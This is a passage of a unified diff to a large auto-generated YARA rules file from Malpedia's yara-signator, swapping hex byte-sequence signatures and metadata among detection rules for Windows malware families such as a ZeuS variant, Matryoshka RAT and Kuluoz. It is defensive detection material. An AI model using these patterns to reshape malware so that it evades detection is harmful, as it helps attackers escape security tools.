 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.payloadbin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.payloadbin_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_068_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "800c1bff3826d8d61dac146dc7e96bbf271b1fb2a9cc74c55e98e32d0540be8c"
+		logic_hash = "cf7d5521a90e4f10a4d7ed99e1e2829b2e957d2aba56d598bf0190ab6bc75eb5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111073,32 +111144,32 @@ rule MALPEDIA_Win_Payloadbin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4158 9d 4158 e8???????? 680269e26f 6811373c52 66450fb3db }
-		$sequence_1 = { 83f803 e9???????? 0f8526010000 488bcb e9???????? ff15???????? }
-		$sequence_2 = { 68eb3a8171 55 68396f8656 6819276b5f 682109a155 4c8b6c2438 48c7442438404fa1db }
-		$sequence_3 = { 52 0f94842418000000 488b942418000000 480fbfd2 80bc1418f0ffffe7 }
-		$sequence_4 = { 4c8d8424a0000000 488bd5 b95d493af4 e8???????? 413bc7 0f85e1000000 8b942498000000 }
-		$sequence_5 = { 488d8c2450020000 2bd2 4d0fb7c7 6641b8b54c 450fbfc7 }
-		$sequence_6 = { 448b542500 f5 4433d7 4084cc 4181c20c7cff4d 41c1c202 f8 }
-		$sequence_7 = { 8d56d4 fa 158935079e 9e 4657 250543b1d9 f661fd }
-		$sequence_8 = { 9c 49bc5c58ad71e53eea3c 4180ec5e f8 4881842408000000e258ecff 685b136c32 }
-		$sequence_9 = { 4180fd52 4983c004 3bc8 e9???????? 0f860a000000 b801000000 e9???????? }
+		$sequence_0 = { 51 8bd1 8b4a08 3b4a04 730d 8b02 8a0401 }
+		$sequence_1 = { 8b0f e8???????? 8d7f04 83eb01 75f1 6808030000 56 }
+		$sequence_2 = { 8d45b4 c645fc02 50 8d45cc 50 8bc1 }
+		$sequence_3 = { 894de8 0fb6c8 8b0c8d00e24500 8bc3 c1e808 0fb6c0 330c8500de4500 }
+		$sequence_4 = { 83f808 73ad 5f 5e 8b4d08 33c0 8b9380000000 }
+		$sequence_5 = { 5d c3 55 8bec 81ec14020000 8365f800 8d85ecfdffff }
+		$sequence_6 = { 8b4514 85c0 7410 3918 7505 394804 7407 }
+		$sequence_7 = { 8bd0 c70424???????? e8???????? 59 50 8d4dd0 c645fc08 }
+		$sequence_8 = { 3955f0 1bc0 f7d8 40 03c1 6683470203 }
+		$sequence_9 = { c70485????????58fe4400 40 a3???????? c3 b9???????? e8???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 3761152
+		7 of them and filesize < 862208
 }
-rule MALPEDIA_Win_Computrace_Auto : FILE
+rule MALPEDIA_Win_Vmzeus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d3f36b5-1638-54d3-9aa2-d37f8e7401b6"
+		id = "66c6a017-6d01-5f54-977c-810778bd36c9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.computrace_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vmzeus_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "b73f0b7c109f121cef0d44673877d18ab031d29ad8713526e9f7233d01c0d2e0"
+		logic_hash = "21af12598bbe8c129f701b1173aa31044d5a02d195bccea2272138762380a86c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111112,32 +111183,32 @@ rule MALPEDIA_Win_Computrace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f802 7462 3bf3 7505 83f8ff 750f 53 }
-		$sequence_1 = { 68???????? 56 e8???????? 8cc8 a803 7503 800e08 }
-		$sequence_2 = { 8d8558ffffff 50 e8???????? 3bc7 0f8eaa000000 }
-		$sequence_3 = { 57 8b750c 8b7d10 8b1f 837d0c00 }
-		$sequence_4 = { e8???????? 8d85fcfeffff 50 ff15???????? 85c0 7505 a1???????? }
-		$sequence_5 = { 83f878 751e b8800d0000 2b4608 8945c0 3945dc 760e }
-		$sequence_6 = { ffb3101b0000 ff15???????? 6840020000 57 53 }
-		$sequence_7 = { 0af6 750f 43 51 8bc4 }
-		$sequence_8 = { 74ee 48 0f85ec000000 8d85acfdffff 50 6801010000 }
-		$sequence_9 = { 837dfc00 74bb 53 e8???????? 8945f8 ff75fc }
+		$sequence_0 = { 8901 b001 c3 55 8bec 81ec08010000 53 }
+		$sequence_1 = { e9???????? 32c0 6a4c 8d7c242c }
+		$sequence_2 = { 7508 6a04 58 e9???????? 32c0 6a4c }
+		$sequence_3 = { f3a4 b001 eb02 32c0 }
+		$sequence_4 = { 6a10 32c0 59 8bfb f3aa }
+		$sequence_5 = { 57 6a44 5a 32c0 8bca }
+		$sequence_6 = { 8901 b001 c3 55 8bec 81ec08010000 }
+		$sequence_7 = { 6a10 32c0 59 8bfb }
+		$sequence_8 = { 7508 6a04 58 e9???????? 32c0 6a4c 8d7c242c }
+		$sequence_9 = { 6a04 58 e9???????? 32c0 6a4c 8d7c242c 59 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Hodur_Auto : FILE
+rule MALPEDIA_Win_Makadocs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1836cfc6-54d1-596d-bd26-13def8f48ebb"
+		id = "d7e05dca-32b3-50ff-8846-a9085f7d1f77"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hodur"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hodur_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makadocs_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "10960e958b4b7c8c59844799eda78e681e350f46bd3cc75a9f3f73ad5cb0c26d"
+		logic_hash = "d5f25f8d17e486ca7957ad641a672887ad1c923171b871947c68e6256fe8b85d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111151,32 +111222,32 @@ rule MALPEDIA_Win_Hodur_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c60647 89c1 80c107 308c04d6000000 40 75f1 8db424c4000000 }
-		$sequence_1 = { 7c70 a1???????? 8d48ff 0fafc8 83e101 7460 ff75e4 }
-		$sequence_2 = { ff75ec ffd0 8b4df0 e8???????? 89f9 e8???????? 31c0 }
-		$sequence_3 = { c7460428381836 c746080c043500 7c12 a1???????? 8d48ff 0fafc8 83e101 }
-		$sequence_4 = { ffb42474040000 ffd0 83f8ff 741f 833d????????0a 7c20 a1???????? }
-		$sequence_5 = { ffd0 c7430271706600 66c703537f 89d9 660f6e4301 660f60c0 660f61c0 }
-		$sequence_6 = { eb25 8d4a60 88e3 88cc 30dc 84c0 88a4148c000000 }
-		$sequence_7 = { e8???????? 833d????????0a 7c1a 8b0d???????? 8d51ff 0fafd1 83e201 }
-		$sequence_8 = { e9???????? 55 53 57 56 a1???????? 8b2d???????? }
-		$sequence_9 = { 81ec30010000 b8f4ffffff c7442406b792a0b4 c744240ab4a1a6a4 c744240e8eb49a00 c7042400000000 c74424141c010000 }
+		$sequence_0 = { 7468 8b33 8b4ef0 8b01 8b5010 83ee10 ffd2 }
+		$sequence_1 = { 750a 6805400080 e8???????? 8b1b 56 53 e8???????? }
+		$sequence_2 = { ffd7 8be8 55 6a00 ff15???????? 8bf0 85f6 }
+		$sequence_3 = { 8b1b 6a0a 8d442434 50 53 e8???????? 83c410 }
+		$sequence_4 = { 8d410c 55 e8???????? 84c0 }
+		$sequence_5 = { c68424b400000016 e8???????? 83c410 c68424a400000017 8b08 8b41f4 51 }
+		$sequence_6 = { 59 8b7508 8d34f5c8514200 391e 7404 8bc7 }
+		$sequence_7 = { ffd0 8b442438 53 8d4c2434 51 8d542448 52 }
+		$sequence_8 = { b9???????? ffd0 83c010 894678 c644241c04 8b15???????? 8b420c }
+		$sequence_9 = { e8???????? 83c40c 8d757c 85c0 7504 }
 
 	condition:
-		7 of them and filesize < 1067008
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Mediapi_Auto : FILE
+rule MALPEDIA_Win_Nokki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aef2b227-dc8a-5a2e-a50c-294091b1c8ca"
+		id = "608277dd-14a1-5c03-9518-935e0938d8bc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mediapi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mediapi_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nokki_auto.yar#L1-L154"
 		license_url = "N/A"
-		logic_hash = "05b9f202f6ca93b9b901cbe156248c6d5653f1e57951835cd81ee0a4bf1d3fbf"
+		logic_hash = "f2978451176a73f0cc8bbc4000d4256ca994dc4b0d13d500f33621551196e998"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111190,32 +111261,36 @@ rule MALPEDIA_Win_Mediapi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488945e0 48837de000 7439 c745f800000000 }
-		$sequence_1 = { 0fb645d9 8d148500000000 0fb645da 0fb6c0 }
-		$sequence_2 = { 0fb645f8 89c1 e8???????? 0fb645f8 89c1 }
-		$sequence_3 = { 4801d0 8b55fc c1e202 83c201 89d1 488b5510 4801ca }
-		$sequence_4 = { 3c2f 0f8558010000 8b45f8 8d5001 8955f8 }
-		$sequence_5 = { 89c1 e8???????? 0fb6c0 89c1 e8???????? 31c3 }
-		$sequence_6 = { 0fb645db 0fb6c0 c1f802 83e00f 01d0 }
-		$sequence_7 = { 3b45f8 7dac eb2e 488b45e8 488d5001 }
-		$sequence_8 = { 488b7308 488b4310 4839f0 7420 488d4608 b908000000 48894308 }
-		$sequence_9 = { 0fb6c0 89c1 e8???????? 0fb645fb 89c1 e8???????? 0fb6c0 }
+		$sequence_0 = { e8???????? 33d2 68ce070000 52 }
+		$sequence_1 = { e8???????? 33c9 68ce070000 51 }
+		$sequence_2 = { 39b890e94000 0f8491000000 ff45e4 83c030 3df0000000 }
+		$sequence_3 = { 50 8d8da8ddffff bfe8030000 51 89bd40d4ffff }
+		$sequence_4 = { 8bff 56 57 33ff ffb7b80d4100 }
+		$sequence_5 = { e8???????? 59 59 8b7508 8d34f500ed4000 391e }
+		$sequence_6 = { c1f905 8b0c8dc02b4100 83e01f c1e006 f644080401 }
+		$sequence_7 = { a1???????? 8b500c b9???????? 895dfc c78554e8ffff01000000 ffd2 }
+		$sequence_8 = { 47 897e14 897e70 c686c800000043 c6864b01000043 c7466860e54000 6a0d }
+		$sequence_9 = { c1e006 03049580054100 eb05 b8???????? }
+		$sequence_10 = { e9???????? 8bc6 c1f805 8bfe 53 8d1c85c02b4100 }
+		$sequence_11 = { 7524 a1???????? a3???????? a1???????? c705????????6a464000 8935???????? a3???????? }
+		$sequence_12 = { 8bec 8b4508 ff34c5100a4100 ff15???????? 5d c3 6a0c }
+		$sequence_13 = { 741b 8b06 8bc8 c1f905 83e01f c1e006 8b0c8d80054100 }
 
 	condition:
-		7 of them and filesize < 246784
+		7 of them and filesize < 454656
 }
-rule MALPEDIA_Win_Spaceship_Auto : FILE
+rule MALPEDIA_Win_Nabucur_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf82a1e6-2655-5412-8f93-024883bc5cc4"
+		id = "af73c704-0513-5e82-a77f-ce8e36675074"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spaceship_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nabucur_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "c325451a252fdb438f6f512d14d550b1461b33c1e3170612d6dfec64ac9a2b26"
+		logic_hash = "ff7129cae3af06c4bcbd1090aa15a0e8967082d3699d9e4f74992cad1754f8c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111229,34 +111304,40 @@ rule MALPEDIA_Win_Spaceship_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc1 8bf7 8bfa c1e902 f3a5 8bc8 6a22 }
-		$sequence_1 = { 2bf9 8bc1 8bf7 8bfa 8b94245c090000 c1e902 }
-		$sequence_2 = { 58 c3 33c0 c3 6800000300 }
-		$sequence_3 = { 0bc1 8d0c40 894c2428 e8???????? 8b442424 8b0d???????? 56 }
-		$sequence_4 = { f3a4 8d4c240c 51 e8???????? 83c408 85c0 0f84d7000000 }
-		$sequence_5 = { 66899c24d6030000 c78424d803000080684100 66c78424dc0300001a00 66899424de030000 c78424e003000078684100 }
-		$sequence_6 = { 8d8c2410020000 68ac5d0000 51 68???????? 68???????? }
-		$sequence_7 = { 85c0 741a 8078ff3a 7506 c6400100 eb03 }
-		$sequence_8 = { 8bc2 83e103 f3a4 5f 5e 81c40c010000 c3 }
-		$sequence_9 = { f2ae f7d1 2bf9 8bc1 8bf7 8bfa 8b942470060000 }
+		$sequence_0 = { 49 23cf 894c241c 3bc3 }
+		$sequence_1 = { 49 3b442430 891e 8944241c }
+		$sequence_2 = { 49 23ce 894f18 8bf0 85c0 0f8521040000 }
+		$sequence_3 = { 49 40 0bf2 85c9 }
+		$sequence_4 = { 49 23cb 894d08 5d }
+		$sequence_5 = { 33ff 397c2434 7e61 8b6c2434 }
+		$sequence_6 = { 009eaa030000 0fb686aa030000 57 83f80a 0f876d010000 }
+		$sequence_7 = { 49 03d3 40 85c9 75f4 8916 }
+		$sequence_8 = { 8b4508 8b00 50 ff15???????? 83bdecfeffff00 }
+		$sequence_9 = { 4d a1???????? 138df6adfe2a 44 b80c83f6cd }
+		$sequence_10 = { 07 03fa d448 f242 26684ef6e738 46 28c1 }
+		$sequence_11 = { be???????? bbb31d3ff8 bb9a21baf8 eb7f 49 }
+		$sequence_12 = { fa dc90fa3d14db 8736 6c 2f }
+		$sequence_13 = { 83f901 752e bae6c060fb eb1f 46 }
+		$sequence_14 = { 6695 09b899f00150 cf 1bf6 47 e5b8 }
+		$sequence_15 = { 49 bbe19321fa e9???????? ba3665c4ff 3006 ebeb }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 1949696
 }
-rule MALPEDIA_Win_Cabart_Auto : FILE
+rule MALPEDIA_Win_Computrace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18a4d4f1-27f1-5b62-ac02-f2e216d2cf4e"
+		id = "7d3f36b5-1638-54d3-9aa2-d37f8e7401b6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cabart_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.computrace_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "4c41cdb81a5db228073171586c9e5e6d6ecfd715a748c36291a1859ea7ac8fe5"
+		logic_hash = "b73f0b7c109f121cef0d44673877d18ab031d29ad8713526e9f7233d01c0d2e0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -111268,32 +111349,32 @@ rule MALPEDIA_Win_Cabart_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6804010000 50 ff15???????? 83c410 6a10 68???????? 8d85fcfeffff }
-		$sequence_1 = { 85d2 7ff4 eb01 42 2bca }
-		$sequence_2 = { 83c420 ff7508 ffd6 8bf8 }
-		$sequence_3 = { 8975fc 5f 395d10 740e 57 }
-		$sequence_4 = { 7d0a 686c090000 e8???????? 8b0f }
-		$sequence_5 = { 7ff4 eb01 42 2bca }
-		$sequence_6 = { 6a50 5e 53 53 53 }
-		$sequence_7 = { 8bd8 ff15???????? 3bdf 5b }
-		$sequence_8 = { ff750c ff7508 56 ff15???????? 56 8bd8 }
-		$sequence_9 = { 68bb0b0000 ebe2 85ff 7507 68bc0b0000 ebd7 }
+		$sequence_0 = { 83f802 7462 3bf3 7505 83f8ff 750f 53 }
+		$sequence_1 = { 68???????? 56 e8???????? 8cc8 a803 7503 800e08 }
+		$sequence_2 = { 8d8558ffffff 50 e8???????? 3bc7 0f8eaa000000 }
+		$sequence_3 = { 57 8b750c 8b7d10 8b1f 837d0c00 }
+		$sequence_4 = { e8???????? 8d85fcfeffff 50 ff15???????? 85c0 7505 a1???????? }
+		$sequence_5 = { 83f878 751e b8800d0000 2b4608 8945c0 3945dc 760e }
+		$sequence_6 = { ffb3101b0000 ff15???????? 6840020000 57 53 }
+		$sequence_7 = { 0af6 750f 43 51 8bc4 }
+		$sequence_8 = { 74ee 48 0f85ec000000 8d85acfdffff 50 6801010000 }
+		$sequence_9 = { 837dfc00 74bb 53 e8???????? 8945f8 ff75fc }
 
 	condition:
-		7 of them and filesize < 32768
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE
+rule MALPEDIA_Win_Xiaoba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b422383a-3b69-5e32-94a3-431dbc17291c"
+		id = "8a2d4ebc-9dbe-5e06-9ffb-a1e3c148bd49"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matryoshka_rat_auto.yar#L1-L135"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xiaoba_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e0e5d3a7b6eaf0039b9fbb2e4baba63862f57599449a2c9f7b8481e16636b102"
+		logic_hash = "1a83b2fe247a6302b4c8d96b4dc9a08c1e85c028cd9a733963d489679c8b5b8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111307,36 +111388,32 @@ rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 b06f c3 b063 }
-		$sequence_1 = { b037 c3 b073 c3 }
-		$sequence_2 = { 747d 488d0d6c400500 e8???????? 4533c9 488d4c2438 4533c0 418d5101 }
-		$sequence_3 = { 747e 448b82f4000000 4585c0 7472 }
-		$sequence_4 = { 8b4710 835714ff 0b4714 75c9 }
-		$sequence_5 = { 8b4714 85c0 0f8539010000 85db }
-		$sequence_6 = { 747e 83f928 773d 7438 }
-		$sequence_7 = { 8b4718 8945f8 85f6 745b }
-		$sequence_8 = { 747e 8bcd e8???????? 488bf8 }
-		$sequence_9 = { 8b4720 40 895f14 894710 }
-		$sequence_10 = { 747f 488bcd e8???????? 488bf8 }
-		$sequence_11 = { 8b4724 0fb611 0fb67101 8b4f18 }
-		$sequence_12 = { 8b4714 85c0 7568 ff742438 }
-		$sequence_13 = { 747d 83bc249000000000 7473 4c8d15d68ffdff }
+		$sequence_0 = { b801000000 85c0 0f840a000000 b88033e101 e9???????? 8b451c 8945f8 }
+		$sequence_1 = { 8b4f04 50 8d942494000000 50 52 50 8d442478 }
+		$sequence_2 = { 895c241c 8907 8b0d???????? 8d6e5c 894d00 899e94000000 c78690000000b8905f00 }
+		$sequence_3 = { 8a1e 84db 7403 c60600 57 51 e8???????? }
+		$sequence_4 = { 8b8f80000000 8bc2 894d08 8b4e28 83c004 3bc1 7607 }
+		$sequence_5 = { 52 50 6a00 8b7c2454 8b4d04 57 6a00 }
+		$sequence_6 = { 85c0 0f8407040000 8b6e34 85ed 0f84fc030000 8b4508 85c0 }
+		$sequence_7 = { 8b4e78 50 51 e8???????? 8b5634 83c408 }
+		$sequence_8 = { e8???????? 8b4c2414 83c404 85c9 8944241c 755c 50 }
+		$sequence_9 = { 8b942488000000 6a00 50 8b842480000000 53 56 50 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 5177344
 }
-rule MALPEDIA_Win_Scarecrow_Auto : FILE
+rule MALPEDIA_Win_Kuluoz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7b0ea4aa-06b5-57ee-9a11-48d883c1ac9c"
+		id = "23b3e89b-1b7f-51fe-9c49-dededa4af110"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scarecrow_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kuluoz_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "e0a208d3de2959898d45be13d981ab096036ca0d633a326493a23160fdc8d314"
+		logic_hash = "e3270208208f4df1bb5bfe1d5ec8560fd50de417e7279c3823b68456c3f49c76"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111350,32 +111427,32 @@ rule MALPEDIA_Win_Scarecrow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c8fc 40 0f85e1010000 0f1f440000 ff45f4 8b45f4 2503000080 }
-		$sequence_1 = { 51 57 ffd0 c6459c00 8bd8 }
-		$sequence_2 = { 8d427f 99 f7fb 885435f1 46 83fe0a 72d9 }
-		$sequence_3 = { c68519feffff2d c6851afeffff37 c6851bfeffff32 c6851cfeffff37 c6851dfeffff26 c6851efeffff37 c6851ffeffff3b }
-		$sequence_4 = { ff75e4 e8???????? 33c0 c745f807000000 668945e4 8945f4 8b451c }
-		$sequence_5 = { c645e603 c645e768 c645e852 c645e960 c645ea75 c645eb5a c645ec66 }
-		$sequence_6 = { 7463 8b8df0feffff 8d4303 03cf 0fafc8 898df0feffff 8b85f0feffff }
-		$sequence_7 = { c6458e34 c6458f38 c6459034 c6459140 c6459234 c6459334 }
-		$sequence_8 = { c7461407000000 c7461000000000 66890e 8b5810 66390f 7414 8bcf }
-		$sequence_9 = { c685a2f9ffff76 8a8595f9ffff 80bd94f9ffff00 7530 33f6 0f1f4000 }
+		$sequence_0 = { 0355ec 8955f8 8b45fc 0345ec }
+		$sequence_1 = { 8b45f0 50 e8???????? 8945f4 837df4ff 7405 8b45f4 }
+		$sequence_2 = { 68???????? 8d4df4 51 e8???????? 0fb6d0 85d2 740f }
+		$sequence_3 = { 2b45fc 894510 8b4d0c 034dfc }
+		$sequence_4 = { 8d45fc 50 6a00 6a00 68???????? ff15???????? 8b45fc }
+		$sequence_5 = { 83c202 52 ff15???????? 8945ec 837dec00 740f 8b45ec }
+		$sequence_6 = { 8b55f0 0fb602 50 e8???????? 8945fc }
+		$sequence_7 = { 8b4d10 8b91fe010000 8b4510 8b4df4 8a09 }
+		$sequence_8 = { 894594 8b4d8c 894df4 8b5590 8955f8 8b4594 }
+		$sequence_9 = { b900100000 f7f1 8b45fc 2bc2 }
 
 	condition:
-		7 of them and filesize < 501760
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Newbounce_Auto : FILE
+rule MALPEDIA_Win_Royalcli_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bdf56a77-5d9e-573d-af2b-c0319e364db4"
+		id = "ff77d805-91a0-5315-ba44-9b60dd6ef815"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newbounce"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newbounce_auto.yar#L1-L145"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.royalcli_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "1757d742189e1562595d26ebbaf5e74bc5236d74e3305389104993dc5b138ecf"
+		logic_hash = "3f942fc64e71d9989fa602e154f4016ccbdc8b8d4e7f9551bd6f613b1bb3b100"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111389,37 +111466,32 @@ rule MALPEDIA_Win_Newbounce_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e00f 7e05 2bf0 83c610 }
-		$sequence_1 = { 488bcb 33f6 e8???????? 4889442438 }
-		$sequence_2 = { 488bcb 482bd3 480355ef e8???????? }
-		$sequence_3 = { 488bcb 488905???????? ff15???????? 488bc8 488d1526d60200 }
-		$sequence_4 = { 488bcb 418906 e8???????? b001 }
-		$sequence_5 = { 488bcb 33d2 45895c2404 45892c24 }
-		$sequence_6 = { 488bca e8???????? be00100000 483bc6 735d 488d8f34300000 488bd3 }
-		$sequence_7 = { 488bcb 458d4110 e8???????? 3bf7 }
-		$sequence_8 = { 81e6ff000000 3304b548576300 c1ea08 81e2ff000000 }
-		$sequence_9 = { 81e6ff000000 33048d485f6300 8b34b5485b6300 33c6 33442428 89742420 }
-		$sequence_10 = { 81e6ff000000 8b14b548576300 89542414 8b9424bc000000 }
-		$sequence_11 = { 81e6ff000000 3344242c 8b34b5485b6300 33442410 }
-		$sequence_12 = { 81e6ff000000 3304b548576300 894c2458 33049548536300 }
-		$sequence_13 = { 81e6ff000000 3304b548576300 c1e908 81e1ff000000 }
-		$sequence_14 = { 81e6ff000000 8b34b548536300 81e7ff000000 8b3cbd48576300 }
+		$sequence_0 = { 8d8dfcfeffff 68???????? 51 e8???????? 83c408 e9???????? 8bc6 }
+		$sequence_1 = { 8b9db0feffff 83c410 85c0 0f8458feffff 8b95e8feffff 8b85ecfeffff 8bcf }
+		$sequence_2 = { eb1d 0fb6043e c1e802 8a9020144100 }
+		$sequence_3 = { 8d85f4feffff 50 ffd6 5e 8b4dfc 33cd b801000000 }
+		$sequence_4 = { 889c3dc0fdffff 47 8bd6 8bf1 }
+		$sequence_5 = { 80bc0500ffffff5c 7403 48 79f3 40 b9fa000000 }
+		$sequence_6 = { 52 ff15???????? 8bc6 8b4dfc 33cd }
+		$sequence_7 = { 8bf2 f3a5 8bc8 83e103 f3a4 8bbd84f7ffff 85ff }
+		$sequence_8 = { 7521 8b55fc 6a04 8d4df8 51 }
+		$sequence_9 = { 8b4508 53 56 68???????? 50 8bf1 e8???????? }
 
 	condition:
-		7 of them and filesize < 8637440
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Acehash_Auto : FILE
+rule MALPEDIA_Win_Dairy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c02dd1c8-b3e7-50ce-a7de-221cfd645c47"
+		id = "133b9699-4dcc-594b-b21a-95c3efab14f3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acehash_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy"
